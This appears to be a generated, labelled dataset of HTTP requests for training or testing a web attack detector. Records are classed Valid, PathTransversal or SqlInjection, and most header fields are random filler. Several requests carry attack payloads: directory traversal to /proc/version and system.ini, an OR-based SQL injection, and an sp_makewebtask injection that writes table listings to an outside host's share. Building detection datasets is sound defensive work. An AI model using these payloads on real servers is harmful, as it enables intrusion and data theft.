Via: HTTP/2.7 90.63.195.184:58189, CmiHti/3.1 253.219.127.50
Transfer-Encoding: deflate
Upgrade: 7ynff/7.0
Warning: 708 255.125.121.38 "eth4asnh" "Sun, 05 Aug 07 12:56:58 UTC"
X-Forwarded-For: 204.19.242.253
X-Serial-Number: 650978480578430420
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21055
Start - Id: 46292
class: PathTransversal
GET /scriptlhHK1c/8icVsariaA/idLxLEDShFlwxpDo/eaictpa/z%uZT1telnetoptlocationo/e7dq@KzWi3wWRbDe@/71nRratohhd3Tyd/wfJdJn637Uhac/nVaECf_TOc@yjbxO/Tees/seTWaqs/l4UJ@t4WO183T.sh?J@DufUeUGn=eB8&Encsk=57046792&includeQhkF75tmpE=6071935&auaU9e=eaccess_logbL%25cl&dTronlornnshqg=dgmail7s8ge&@Gdrop_0QuJ@=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fversion&xeoiqaitrueh=lOydiv&s0koeeops2r=XetelnetrcPValt6&vrs=fadminhtaccespieoE4ld&opm7NQpipc=4&oaHooqoe2nw6=rmUS HTTP/1.0
Host: www.6r6obr7.fr
Connection: close
Accept: audio/*;q=0.3
Accept-Charset: windows-874;q=0.8, euc-tw;q=0.7, windows-1255, iso-8859-15, cp-932
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 54.146.114.194
Cookie: eok=titt6toBtma
Cookie2: $Version="38"
Date: Wed, 24 Dec 08 20:38:17 CET
ETag: W/"Tr79t_UXhl_B.uI5Su"
Expect: 100-continue
From: ysse83ei@yttEeHd.biz
If-Modified-Since: Sat, 28 Mar 09 04:09:29 CET
If-Unmodified-Since: Wed, 18 May 05 07:08:36 UTC
If-Match: *
If-None-Match: "BWYnQVYZZntYhMidtpH"
If-Range: Fri, 29 Oct 04 11:02:37 CET
Max-Forwards: 298
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Basic aGlFYTp3YXR0T24=
Authorization: Basic Ym8zRHhlTjp0VURo
Range: 5-,07-2
Referer: http://www.g0be.gov/9sioTnrr.dll
TE: chunked,trailers
Trailer: If-Unmodified-Since
User-Agent: te0AJOKS2 http://www.22sI.org
UA-CPU: PowerPC
UA-Disp: 542,0115,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 1380x824
Via: 4.3 255.38.36.72:275, 6.0 www.Yotnu.htm
Transfer-Encoding: compress
Upgrade: seEc/8.9, 7elors/6.3, 4uhv/9.8, I5eg5m/5.5
Warning: 165 170.166.64.203:01144 "oSte0enOhlsosme9awi" 
X-Forwarded-For: 177.74.168.130
X-Serial-Number: 0260257
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46292
Start - Id: 21483
class: Valid
GET /es29y/rcpdmhIq5JNKcmdlsd/ecIwe/Qouc1u8z/x-DeT/M-q4Hy@ix0W2Di/RR/lmECLgL.bin?FdWbtLNPi=zhjIn&aasteoEi9l4nxd=emeldjo8lhsaAo&-b_NN5SR=s+ee17&5iay=sieuynr2ta&9xp_Nr2T=4492716559&NJRG4wheresstylevVciframe=hR&nmr=78iievy&t5j1ff4oeceaiwi=g4LjW&rewfoinmEys8zoo=bR-&ody9iuy=f2andh%24I9&eCli0oafT=tt%3Escriptndu&iyi7odk4tHtok=aI6x_Dx_VE%40 HTTP/1.1
Host: 35.30.16.137:06781
Connection: keep-alive
Accept: image/gif;q=0.7
Accept-Charset: x-mac-korean, x-mac-hebrew;q=0.1, iso-8859-7, iso-2022-jp
Accept-Encoding: deflate, deflate
Accept-Language: otti-hs;q=0.7, skeal-ieks, yL-to, nu-cikea;q=0.1, zcroci-lt;q=0.3
Cache-Control: no-store
Client-ip: 186.35.24.227
Cookie: dutfwnyoaooss=rzmidiwsvlu ti 
Cookie2: $Version="99"
Date: Wed, 28 Apr 04 03:55:30 UTC
ETag: W/"SP92jKSMi0F97Ui36wfH"
Expect: en24het
From: n6aee@n6bro.ch
If-Modified-Since: Sat, 12 Jun 04 08:33:11 GMT
If-Unmodified-Since: Fri, 02 Nov 07 20:32:20 UTC
If-Match: "u@Y65D083U.Rtv5S"
If-None-Match: "5amH2Q4mvkj.J8yWd"
If-Range: Mon, 08 Jun 09 23:07:00 UTC
Max-Forwards: 3
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: NTLM ZUFlc2hncG5tZjZvMHNkcnRkdHNkWGluMWVrZWlkdHlzc2VuYg==
Authorization: Digest opaque="i1eyo"
Range: -90,-13698,843877-
Referer: /oevidh2/wrkyesi/dttrot/eoC5ea/inca.jpg
TE: trailers,deflate;q=0.2
Trailer: Connection
User-Agent: aotdijue
UA-CPU: PowerPC
UA-Disp: 130,178,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 7753x3387
Via: 0.6 199.121.32.63, 0.4 23.99.138.198, FTP/1.0 www.unnisn.png
Transfer-Encoding: deflate
Upgrade: Hnpe3d/2.9, aor/1.2, Unn8/1.9, tgr5/3.9
Warning: 550 www.i2iee6oc.shtml "oSacwy8tbotbo3s3Oheu" 
X-Forwarded-For: 20.195.227.96
X-Serial-Number: 099160338549
----: ------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 21483
Start - Id: 1033
class: Valid
GET /rtkio/apnasttgfehif6nadm/nanx/XmxNvdqYJhttps2W.shtml?orheop=n5spRpor7sCss4Tt&baorndrw=%2BaiBn&4ndstdjDS=dIvfmfBAQRFD&YWiframek=e2document&rrhw=4718411&ube4vr7ueetgipn=mcatr%27jniam&hmtiprhw6einyYi=62&eoodsh=iupdateruc&varevalLIwL1=osOawctarvncsznus&7sceDzn6erl=4tleibDmsskdsa&teuE=thsROaeRram&s05m=%3Ca&otdaraaacz8lis=81416 HTTP/1.1
Host: 73.91.100.241
Connection: gyyz8ado
Accept: audio/*, text/plain
Accept-Charset: windows-1254;q=0.2, ks_c_5601-1987, windows-1251, hz-gb-2312, cp-936;q=0.2
Accept-Encoding: *
Accept-Language: AetP1wn-toaa;q=0.1
Cache-Control: no-transform
Client-ip: 131.45.136.130
Cookie: ttauaceeirtiw=52i1a41If9en;fdocoeyd1seqe=;i[eiadropnte0dopositiona0oolt ;tell1pb=9219;ge=Fr<lnosystemeteNtOhp;ocivtnyecuftrr=0IFjoFYZ77L
Cookie2: $Version="135"
Date: Mon, 22 Jan 07 14:06:15 GMT
ETag: W/"yDBLKP4mGSzcRpCuZ9CS"
Expect: 7e3se
From: lSpom@es6vknOma.biz
If-Modified-Since: Sat, 28 Mar 09 03:50:42 GMT
If-Unmodified-Since: Tue, 26 Aug 08 12:12:11 GMT
If-Match: *
If-None-Match: *
If-Range: "qsGyYbjVRISMD2w"
Max-Forwards: 51
MIME-Version: 1.5
Pragma: h=e
Proxy-Authorization: id7l4l x1fuyra=sVlhNT
Authorization: NTLM enR0YW9haTZ0b1dhdHZ5dHFnYU5yaUliNGFzdDRyb3ZjRWh1bHJk
Range: 339-65412,180-85,-47
Referer: /r1use7nu/ogvefnrk/af7ajndd/acslotji/eoUnySil.mdb
TE: chunked,gzip;q=0.6
Trailer: If-Modified-Since
User-Agent: oKVz._fV1 http://www.steA.fr
UA-CPU: MIPS
UA-Disp: 108,3114,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 5033x777
Via: 7.4 www.TbtEooir.shtml, nRd/4.0 www.MEareea.png, 8.2 150.113.238.100:44632
Transfer-Encoding: identity
Upgrade: dI0/5.9, ptFko/5.7, ret/5.4, dsWpt/9.5
Warning: 976 www.rhtLT.css "c1yti6plTceoEa5eim0a" "Sat, 16 Jul 05 16:22:57 CET"
X-Forwarded-For: 101.119.184.116
X-Serial-Number: 3135796940
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1033
Start - Id: 41136
class: SqlInjection
GET /dXb@3RHOusf/rCHdiah1acon/Yan2gb/@E9oLli/MeN/dM4DRxqcugRrG@Yfd3W/lV73htJ9rGX6K.mvl/tH.shtml?rr=625709&FDGQI-E-OOals=Dp4&twIn1Be=084&Y9Sz=w-passwdro&yghomeQix=3838&NawsntjEeofpke=%27%3B+++++EXEC+++++master..sp_makewebtask+++++%22%5C%5C65.158.8.3%5COE%5Cnzeo.js%22%2C++++%22SELECT+++++*+++++FROM+INFORMATION_SCHEMA.TABLES%22&5re=aoyer HTTP/1.1
Host: www.uNeEbn.st
Connection: close
Accept: */*
Accept-Charset: windows-1251;q=0.7
Accept-Encoding: gzip;q=0.7, deflate, deflate, compress;q=0.4, identity
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 1.110.214.117
Cookie: gNhCqt2divshutdownVDO=ne5eaia5is6ricyr;tfssdniewbeg=ees(g eval/r;zyF1sm1J7=reelA\n;tu=Mre;lhRmm=sS84pn;b5b0TUat=gnxAOJrt8
Cookie2: $Version="318"
Date: Sat, 28 Nov 09 11:02:53 CET
ETag: "_PVvZ3pptlKvBANE9Q82"
Expect: 100-continue
From: r3rduu0D@aEtfemeowc.cz
If-Modified-Since: Sat, 10 Jul 04 14:14:37 GMT
If-Unmodified-Since: Fri, 20 Jun 08 11:21:43 CET
If-Match: "@OvZOKpmLqwcNPhkkJu"
If-None-Match: "KuNHUMzqJiC.OFi6Wx"
If-Range: "KuHTSHQH3xkyPaCIzW4"
Max-Forwards: 0987
MIME-Version: 9.5
Pragma: pek=rw
Proxy-Authorization: Basic dDlsN2UzOnJnZWUyZQ==
Authorization: aAilsa nrAc=ahnoer
Range: 9-668228,-687
Referer: /8aissje/cquafC/eerFr/ltnl/t21ogcn.zip
TE: gzip;q=0.4
Trailer: If-Unmodified-Since
User-Agent: o0Uxhg (eQCY2k; oGj48LTkd; 6eFy575; m6Pn.BxI)
UA-CPU: Sparc
UA-Disp: 080,7533,8
UA-OS: FreeBSD
UA-Color: color16
Via: 6.0 194.164.85.51, FTP/2.8 138.100.61.254
Transfer-Encoding: deflate
Upgrade: ng6s/4.8, 4et/8.2
Warning: 198 130.0.9.220:076 "si9M9yfcee" 
X-Forwarded-For: 169.105.19.193
X-Serial-Number: 067866355817969470
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41136
Start - Id: 8506
class: Valid
GET /etbtatyIjp35u4uis/sO2fzvlB5qwXZd/SCB5oJ.htm?IBzroby=rirzrh1bi&l90e7mciA=yyiF%40a%3Dsle4tret%7C4c&9ncmz2hei=87868&deaeeit=FS%3Fbo&eaeaec=5 HTTP/1.0
Host: 60.20.170.25:80
Connection: keep-alive
Accept: video/*;q=0.3, application/*, application/*;q=0.4
Accept-Charset: x-mac-chinesetrad, iso-10646-ucs-2;q=0.9
Accept-Encoding: identity;q=0.3, gzip
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 118.234.207.145
Cookie: nnNvnuNbsUt=1;hrorwnlD=nhtls7ahn;9ulhKofl4eep=stern1;alvstehfqernego=samare4jElddh4?ahesm&;eeejhnmbeaea=19
Cookie2: $Version="14"
Date: Mon, 08 May 06 16:36:15 UTC
ETag: W/"d5PVrDJeSevzvD1WQRu"
Expect: 100-continue
From: esnowat@SliNzma.gov
If-Modified-Since: Sat, 10 Jan 09 23:57:12 UTC
If-Unmodified-Since: Wed, 29 Jun 05 14:17:35 GMT
If-Match: "b4Y1F_b-4aBpQhWqT"
If-None-Match: *
If-Range: Sun, 20 Jun 04 15:31:24 UTC
Max-Forwards: 31
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: Digest username="acgtn"
Authorization: Digest cnonce="eehiq"
Range: 288-033,80242-026
Referer: /rhnrn/epHem.css
TE: deflate;q=0.1,gzip;q=0.4,trailers
Trailer: Authorization
User-Agent: nm3DmBPCYz http://www.8szt.fr
UA-CPU: 68000
UA-Disp: 7723,577,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 6704x1260
Via: 7.7 www.lSteyJ.jpg
Transfer-Encoding: identity
Upgrade: Rkttt/8.8, r9on/0.9, pnI/3.5
Warning: 054 220.48.171.98 "iEbptnlss" "Sun, 08 Mar 09 01:03:10 CET"
X-Forwarded-For: 249.204.156.98
X-Serial-Number: 116122935
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8506
Start - Id: 7140
class: Valid
POST /zdivBzM.l5lU@.dll? HTTP/1.0
Content-Length: 84
Content-Language: 9mtu
Content-Encoding: identity
Content-Location: /dedtoc/tcazrera/tijod/cesmoeo/4g6pM.asp
Content-MD5: ZW5lbHptYUl1ZGFmY3R2OA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 11 Feb 05 20:44:53 CET
Last-Modified: Sat, 20 Aug 05 17:52:35 GMT
Host: 47.41.237.253
Connection: atmvu
Accept: application/rtf;q=0.3, text/*, text/xml
Accept-Charset: cp-936
Accept-Encoding: compress, gzip, deflate, gzip
Accept-Language: *;q=0.8
Cache-Control: uul='euymtwn'
Client-ip: 19.198.82.20
Cookie: foniloce6h1onol=e0cbP1a;me7ndb3t6ieixr=:
Cookie2: $Version="78"
Date: Mon, 27 Feb 06 15:19:51 UTC
ETag: W/"N4NOWjMpwuzpiZP4_mP"
Expect: 100-continue
From: kntoo@5rda2fql.com
If-Modified-Since: Fri, 22 Jun 07 03:56:45 CET
If-Unmodified-Since: Thu, 17 Sep 09 12:46:41 UTC
If-Match: *
If-None-Match: "qGr5tLmh2Gj-7Yc3nBj"
If-Range: *
Max-Forwards: 325
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: Basic ZWhSOFI6MWUzb3M=
Authorization: Digest qop=auth
Range: -25076,-76
Referer: http://prtprEi.net/r1CaaDA1/cmedtcTt.asp
TE: chunked
Trailer: Pragma
User-Agent: Mozilla/6.2 (Machintosh; U; Mac OS X 5.8; tg-sY; rv:0.3.0) Gecko/49377624
UA-CPU: MIPS
UA-Disp: 4314,0778,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 849x6253
Via: HTTP/4.2 10.83.217.0:53
Transfer-Encoding: ntol; cdee=1gHreefe
Upgrade: rnoslw/5.8
Warning: 454 www.foneu0k.js "qrteSieoenEaraosa" 
X-Forwarded-For: 229.243.169.191
X-Serial-Number: 73109423646427331
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Tln4=umgenwi&osmip=v89o%o2&t_8fJK5P9H0=eMYh4hpLbZi&yteaisBxk5lene=uihle\nn+(

End - Id: 7140
Start - Id: 42647
class: SqlInjection
GET /eIrmC/6mSxrs21cs/eQqAkFI/f_6fokKNb3eVB9vlp/dg9SigogrGtdq9a0ltio.swf?msacrieg1zq9mg=%27+++OR+%27uoReqtr%27++%3E+++%27S&CO9D.land.dmeta=nsEelfprrit&etcIvGaVstdinscript=s+m63eon&il45pue91ttXn3s=40158612&nEcltlas=xtermulul HTTP/1.0
Host: www.tiihtxo.uk
Connection: close
Accept: video/*;q=0.2, image/gif
Accept-Charset: cp-932, windows-1257, windows-1250;q=0.0
Accept-Encoding: *;q=0.2
Accept-Language: cRslH-em4og, rExrbvih-n, coyntut-eore
Cache-Control: max-stale=793
Client-ip: 183.138.44.237
Cookie: EnullC1TzJreplaceg=83oM
Cookie2: $Version="2"
Date: Mon, 07 Jul 08 12:27:34 CET
ETag: W/"d99n_-k.LjOX0-pI"
Expect: 100-continue
From: z74ht@xqb9ivEose.gov
If-Modified-Since: Wed, 26 Dec 07 17:20:41 UTC
If-Unmodified-Since: Sun, 22 Feb 04 15:33:12 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 25 Oct 04 07:51:24 GMT
Max-Forwards: 606
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: NTLM bW9tc2VkRWh1Y21SbnRPbmJ0ZUNhZXllVGVoMm9lbHRQZ3Vt
Authorization: Digest nonce
Range: -5
Referer: http://www.rRhuina8.it/zazan/eaCrh/icoeniE/llnzFt/s1stgb.mpeg
TE: trailers,trailers,trailers
Trailer: Max-Forwards
User-Agent: aslt92ts/9.1.9
UA-CPU: PowerPC
UA-Disp: 0660,7144,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 4720x346
Via: FTP/0.7 136.93.198.77:38
Transfer-Encoding: gzip
Upgrade: eyy/2.8, zqo/4.6, tfea/5.6, tnwsfs/8.5, Iut/4.9
Warning: 577 221.133.112.12 "Eaaers" 
X-Forwarded-For: 32.163.55.249
X-Serial-Number: 81024686129
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 42647
Start - Id: 32370
class: Valid
GET /ohaWiasocie6ffawEE/JZbOcd/oQNYM/DmPZGgmfE6o/hEVQ7O.c3JGAgOUDwc/kUN85EmqgC-/o8WP1suSO7hTkK/uarLaewcOulivlt/E_I7wIpasswdCyl/KQ.htm?nv5kiehlsx=fcCw903sd HTTP/1.1
Host: 59.138.171.22
Connection: hdiTuTru
Accept: */*
Accept-Charset: cp-950
Accept-Encoding: deflate, compress;q=0.6, deflate
Accept-Language: E99-eecyho;q=0.8, i3hswt-pyq6ii;q=0.2, beudv8h-iit2ba, ahleTl-e3tseaO;q=0.3, sS-h6cD9ine;q=0.0
Cache-Control: only-if-cached
Client-ip: 104.115.242.68
Cookie: a6=8;Yj1ajc6aND=n4;1LgYs=38
Cookie2: $Version="300"
Date: Mon, 08 Sep 08 18:51:27 CET
ETag: "bcP7TEQV0EcuH2331p"
Expect: ifevrnpw=lsoed;huSi=sNi7ezt
From: nTc4g7an@ldne.de
If-Modified-Since: Sat, 01 Nov 08 04:21:22 CET
If-Unmodified-Since: Mon, 30 Nov 09 06:25:38 CET
If-Match: "1s3e8rAL4-RDUFq"
If-None-Match: "XwmOZ@yMLiRqz29iPDGq"
If-Range: "VIV7r.0YQ_bJQ7_@O0L"
Max-Forwards: 657
MIME-Version: 5.0
Pragma: RgNhoie=taoet955
Proxy-Authorization: NTLM Y2l1YXR0bnBuZWJsaWF5a2VyZW9ucGg5Z3VpbnVlcGRkcmV5dHh0MGkzbw==
Authorization: NTLM bHFlb2d0SW9lSHdtZWwwc29nZmRoZGljcmRNYWhhaWVlb2VsZ3c=
Range: -767,36952-,-33
Referer: /o4mgOe/e2rirr.sh
TE: trailers
Trailer: Host
User-Agent: Degder1Datg1
UA-Disp: 0077,169,16
UA-OS: Solaris
UA-Color: color16
Via: 3.4 84.154.95.176
Transfer-Encoding: compress
Upgrade: efetu/5.8, xwp/3.1, aeabu/6.7
Warning: 626 www.8nnanJh1.js "cilEofpcabieeSl0p4hz" 
X-Forwarded-For: 36.205.47.170
----: ---------------
~~~~~: ~~~~~~~~~~

null

End - Id: 32370
Start - Id: 21808
class: Valid
GET /08w/aLqOH9K@z4QSFk33/a2Dh.4/ezgJx/.D/atdisedssNutaiu1s.mspx?OMLor=oxurin9&ahzouy8hne0lie=aPYdf&RFeKxRlmj=9u%3Ed&tarn=natktttghi2dl HTTP/1.0
Host: www.0ro1EteOdr.biz
Connection: close
Accept: video/quicktime, image/*;q=0.5
Accept-Charset: euc-tw, iso-8859-15, windows-1254;q=0.2, x-mac-cyrillic, iso-8859-8-i
Accept-Encoding: *;q=0.9
Accept-Language: liwc-urc;q=0.9
Cache-Control: no-transform
Client-ip: 142.94.39.150
Cookie: dl=aIm_fG8ta
Cookie2: $Version="4"
Date: Mon, 04 Jan 10 07:34:41 CET
ETag: W/"h2ZOQ8GkeMdfl7Omwh"
Expect: 100-continue
From: qn7fi@stAorh.org
If-Modified-Since: Tue, 09 May 06 08:33:27 UTC
If-Unmodified-Since: Fri, 24 Aug 07 04:39:37 CET
If-Match: "G8GhglZlq395IVA7M"
If-None-Match: *
If-Range: "gk4wh8fcxwRRJU6RCO3a"
Max-Forwards: 4
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: NTLM cXJlYXNDbkE2enhlbW40aHI0emdld2hlb296aWU3bm4=
Authorization: 1hea0s HicCssn=rire
Range: 836-,-46
Referer: /oi3n.php
TE: chunked
Trailer: Max-Forwards
User-Agent: Mozilla/0.4 (X11; U; Unix 9.4; 8g-se; rv:6.3.9) Gecko/93371682
UA-CPU: StrongARM
UA-Disp: 488,0035,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 5280x218
Via: 0.8 11.126.27.101
Transfer-Encoding: identity
Upgrade: eAsu/5.0, gdb/6.1
Warning: 281 www.mehu.png:9321 "ryoermnI0lwry" "Sun, 27 Nov 05 22:05:35 CET"
X-Forwarded-For: 32.5.142.115
X-Serial-Number: 8436166703567420278
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21808
Start - Id: 33418
class: Valid
PUT /oimaB/e34rcnea3hD/oIR_DVb/n2_HE3fE.NTUG/tQ9tD0FO9PCB3@EtDF_7/i.Hg.AbW23H/Raquejdlep/rbetFn/ePf1NgS3.mdb? HTTP/1.0
Content-Length: 41
Content-Language: Rernty3t,ertCLrd6
Content-Encoding: compress
Content-Location: /cbES.pl
Content-MD5: YTNpTWpsYWlldTNoaWUwaA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 04 Nov 06 09:09:16 GMT
Last-Modified: Mon, 23 Feb 09 12:01:36 UTC
Host: 125.233.191.117
Connection: 9deoe
Accept: application/*
Accept-Charset: *;q=0.0
Accept-Encoding: deflate;q=0.8, compress
Accept-Language: v16t-ngw0, V4ttmr-arorem, 4esm-taa;q=0.5, m-ekdeY;q=0.4, HNt-ep2ot;q=0.5
Cache-Control: no-transform
Client-ip: 176.30.127.43
Cookie: 95Z_lH.IcHp=925614;en=Odg?oAadud8di
Cookie2: $Version="2"
Date: Fri, 13 Aug 04 18:13:21 UTC
ETag: W/"60IDLh3ofRYVDqXC"
Expect: 100-continue
From: airohua@gtscArwrS.org
If-Modified-Since: Mon, 21 Feb 05 21:38:18 CET
If-Unmodified-Since: Thu, 26 Feb 04 20:04:57 GMT
If-Match: *
If-None-Match: *
If-Range: "7xmJkT_ikb9I2OlfErO"
Max-Forwards: 8830
MIME-Version: 6.1
Pragma: h7mdeS='hOron45'
Proxy-Authorization: Basic RzRoZHJpbjpncHNuNGllNQ==
Authorization: NTLM ZmFtYXZuNDBpZWhvOG84ZUVwZE00YXNzdTh3ZEVlZXdUb3Ryb2g=
Range: -45727
Referer: http://haeow.st/rrczcst/oS0e/awc3/ihhnn/noIas.tar.gz
TE: gzip,trailers,trailers
Trailer: If-Range
User-Agent: Mozilla/4.8 (Machintosh; U; PPC 8.7; th-se; rv:2.2.3) Gecko/27810766
UA-CPU: MIPS
UA-Disp: 326,087,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 669x659
Via: 6.4 13.74.91.16, FTP/9.2 2.124.180.139
Transfer-Encoding: deflate
Upgrade: nh8ds/3.8, yrlwgt/2.4, shsE/2.1, ayk/2.4, 1nqqr0/3.4
Warning: 647 164.77.60.132 "hnhznlfessi6tA" "Sun, 14 Feb 10 03:58:44 GMT"
X-Forwarded-For: 229.236.129.140
X-Serial-Number: 538088947583493833
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

MAoqKWI0=7398007&af= O t&nanreBw=atstO8ad

End - Id: 33418
Start - Id: 28601
class: Valid
GET /hZSZ5E@b-ejCkKOgvPUK/iFdani48tceo/vhavinga0H8_7TygQ.T/eny2_r7gG.asmx?tyforttdwbRin4o=29140294&Hrar=59&shSbe7=116101&zQ4L5meta1y=Ihohx%3B&Ses=ryreec%28+%40nk%29%3D04scripta%3A&eop=Ostmp&bcln0eittstlgni=94&nubemr7=0781073743&iegt7cs=bIweclTpall6%3Ceheaedexecht&i3laiGnbneaiwe=265&mnnngaldehiS=iCu+hreawN+l&EueiAebni=rft9 HTTP/1.0
Host: www.7fSauLea.cz
Connection: close
Accept: image/png
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.8
Cache-Control: max-stale
Client-ip: 61.4.150.176
Cookie: 5erekuaep9is=Ssce;epalshneeta=te
Cookie2: $Version="4"
Date: Sun, 12 Dec 04 05:50:35 CET
ETag: W/"z4rKMjg3L9hK7P1So"
Expect: 5atetUe
From: 9Dpl6@nhtia.be
If-Modified-Since: Mon, 01 Feb 10 21:28:01 GMT
If-Unmodified-Since: Fri, 28 Apr 06 02:49:26 GMT
If-Match: *
If-None-Match: *
If-Range: "menkta3GdXSOm3bF-NUb"
Max-Forwards: 847
MIME-Version: 1.3
Pragma: dt45='yenefa'
Proxy-Authorization: Digest opaque="nteit8ao"
Authorization: ibppWf euTtd5l1=ihtoo
Range: 850343-4980,8739-,53-
Referer: http://b5rwer.be/vyfsh/oitr/slohh/r2e6ande.wmn
TE: trailers
Trailer: Cache-Control
User-Agent: Mozilla/6.2 (X11; U; Unix 3.7; ts-ta; rv:1.0.4) Gecko/05187031
UA-CPU: MIPS
UA-Disp: 224,8180,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 379x210
Via: 7.8 249.31.167.58, 4.5 www.hxodar.html
Transfer-Encoding: compress
Upgrade: issdao/1.6, ueifs/7.9, 0inuu/0.1, iiele/3.9, akt/0.1
Warning: 221 www.1et65lOl.htm:396 "oiug" 
X-Forwarded-For: 250.195.95.132
X-Serial-Number: 90657
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28601
Start - Id: 36088
class: PathTransversal
GET /nDwqgin0eriutf/pjsaRyshe712HRG.P/aypst2nbmesh7biatn/s8cEzYHXL6BncO9y7i/PzQqKV29YQ6_Q/xJ3K/8PFSXL6.O/gHqWh0.rsWo5/c7te4/re/si3XzV0hlpC.gif?27VP7ARobject=1302727&7nt=nv+c%5D&tmpQayxtermue=roDCQ&rtaoa=tee%40ogdN+v&4qWmoewC2Ihtp=..........................WINNTsystem.ini HTTP/1.0
Host: 149.207.106.68
Connection: ruyeeiEp
Accept: */*;q=0.1
Accept-Charset: iso-8859-9;q=0.5, iso-8859-6;q=0.6, x-mac-icelandic, windows-1251, iso-8859-9;q=0.6
Accept-Encoding: deflate;q=0.6
Accept-Language: *
Cache-Control: no-transform
Client-ip: 50.135.3.140
Cookie: deosoelId=in;laulwoerlseht=2142942;dcelt=2383;ewleAsn9Nls=9008;fckeoh=56250;sst6r=ohin%ryq<
Cookie2: $Version="6"
Date: Wed, 12 Nov 08 20:53:12 GMT
ETag: W/"vj6-gIvwcOr79OE6"
Expect: 100-continue
From: 2srfon@a2wsst04Ft.cz
If-Modified-Since: Mon, 24 Mar 08 01:19:56 GMT
If-Unmodified-Since: Mon, 26 Mar 07 01:15:47 GMT
If-Match: "pJAnMs@qp5xjKKVe"
If-None-Match: "-oBfzpzaj9oE7nlgO_68"
If-Range: *
Max-Forwards: 53
MIME-Version: 8.7
Pragma: m='plP90'
Proxy-Authorization: Digest username="ftps"
Authorization: NTLM dFNsaGdwcnNzbUVlcnR5ZWVpbGFtbzdyZXRpZW96bHBub2l6c25n
Range: 580617-399630,-49399
Referer: http://www.rt3f.com/1kvja1l.asmx
TE: trailers,deflate;q=0.7,trailers
Trailer: Pragma
User-Agent: fmoaauMoo
UA-CPU: Sparc
UA-Disp: 6269,3972,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 039x0543
Via: 2.7 101.14.29.209:9
Transfer-Encoding: gzip
Upgrade: Fd1sk/0.3
Warning: 647 231.206.148.64:01 "5tdtn" 
X-Forwarded-For: 67.242.104.199
X-Serial-Number: 0275337100162
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36088
Start - Id: 29080
class: Valid
GET /enp2G3u-.RQCBQD/ngn/a1ZWmBzZ5vwWKWky/uabgstueEizPei/rt/aeVwcR3/n6Tnj/ihnzonv.png?edus2ee6twno=eOm1uILGH&ungttfhboe=28&T4OWF=iecdtToeNe&DausrYNscript=9eoio3talalysnbT4a&rt=ekkcpsprocessing-instructionEloltj&flNteC=6wYNxTbR-xA HTTP/1.1
Host: www.hritsseito.be
Connection: ees5a
Accept: video/mpeg;q=0.7
Accept-Charset: x-mac-korean;q=0.2, x-mac-turkish
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 250.148.123.13
Cookie: hul=mcIiaifiDowimtl;JbinDtmpCi..GG=s;3.Pagroup byzkHwhtZ=isnph-ro
Cookie2: $Version="646"
Date: Thu, 25 May 06 22:47:30 GMT
ETag: ".a2d8bCjaE9.p6WkFJ"
Expect: wpf7oUq
From: syrdl@6euah60oan.net
If-Modified-Since: Wed, 20 Apr 05 03:57:05 GMT
If-Unmodified-Since: Tue, 10 May 05 22:41:11 UTC
If-Match: "kr0Qa_nq0APGPbB"
If-None-Match: "z0kffQygBfdjn-eo4tAo"
If-Range: "kXdJBdgJ9SVKxbT6N"
Max-Forwards: 3293
MIME-Version: 4.7
Pragma: eh='tacC'
Proxy-Authorization: gssa mdooRR=usOT
Authorization: Basic bXl3YTp3a2Vpbw==
Range: 2-728395,2-644,-332
Referer: /srjlsf9h/aieraie/sgRDs/1tRe.pdf
TE: chunked;q=0.0,trailers
Trailer: Accept
User-Agent: Mozilla/7.5 (compatible; lhH7ifdtt; Solaris; 8arnen; t0rr)
UA-CPU: x86
UA-Disp: 7928,6331,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 7035x2807
Via: ngfBoL/4.6 23.142.20.45:47
Transfer-Encoding: kr1are
Upgrade: teav/2.5, xneK/0.8, ecrUt/0.0, a8tr/4.9
Warning: 929 www.3dntro.js "lebaflentiiernr" 
X-Forwarded-For: 251.84.212.195
